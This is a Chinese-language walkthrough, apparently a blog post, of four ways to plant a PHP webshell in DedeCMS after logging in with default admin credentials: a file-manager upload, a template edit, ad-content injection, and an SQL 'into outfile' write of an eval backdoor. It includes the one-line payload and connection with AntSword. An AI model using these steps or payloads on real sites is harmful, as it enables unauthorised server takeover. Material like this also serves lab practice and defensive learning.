dedecms(四种webshell姿势)

步骤一,登录网站

步骤二,进入后台

账号密码同为admin

姿势一,通过文件管理器上传WebShell

登陆到后台点击 【核心】--》【文件式管理器】【文件上传】 将准备好的一句话代码上传...OK

1.我们先创建一个1.php上传

2.上传之后我们双击1.php

3.我们进入1.php页面

4.蚁剑连接

姿势二,修改模板文件拿WebShell

与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下

1.我们修改一下index.htm,index.htm修改为php在第一段添加<?php phpinfo();?>点击保存

2.点击 【生成】【更新主页HTML】--》将主页位置修改为【/index.php】--》

点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...

3.访问/dede/../index.php

姿势三,后台任意命令执行拿WebShell

点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

1.添加内容在广告内容添加一句话木马其他的谁便写

2.点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

3.访问/plus/ad_js.php?aid=1

4.蚁剑连接

姿势四,通过sql命令行工具获取webshell

点击【系统】【sql命令行工具】--》多行命令中输入select '<?php @eval($_POSTcmd);?>' into outfile '+路径+创建文件名

1.输入命令

2.点击确定

3.确认有记录

相关推荐
梦帮科技44 分钟前
Rust+Tauri+EVM:构建下一代内存安全级数字版权(DRM)主权音频网络与跨链金融系统的技术实践与全景架构
网络·安全·架构·rust·区块链·音视频·web3.py
@insist1233 小时前
系统规划与管理师-信息安全规划概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
xixixi7777713 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_4665252913 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz5678913 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_9547083114 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
冰茶丿15 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
长风23017 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全
云水一下17 小时前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
技术不好的崎鸣同学18 小时前
Windows 命令提示符(CMD)恶意脚本分析篇
网络·windows·安全·系统安全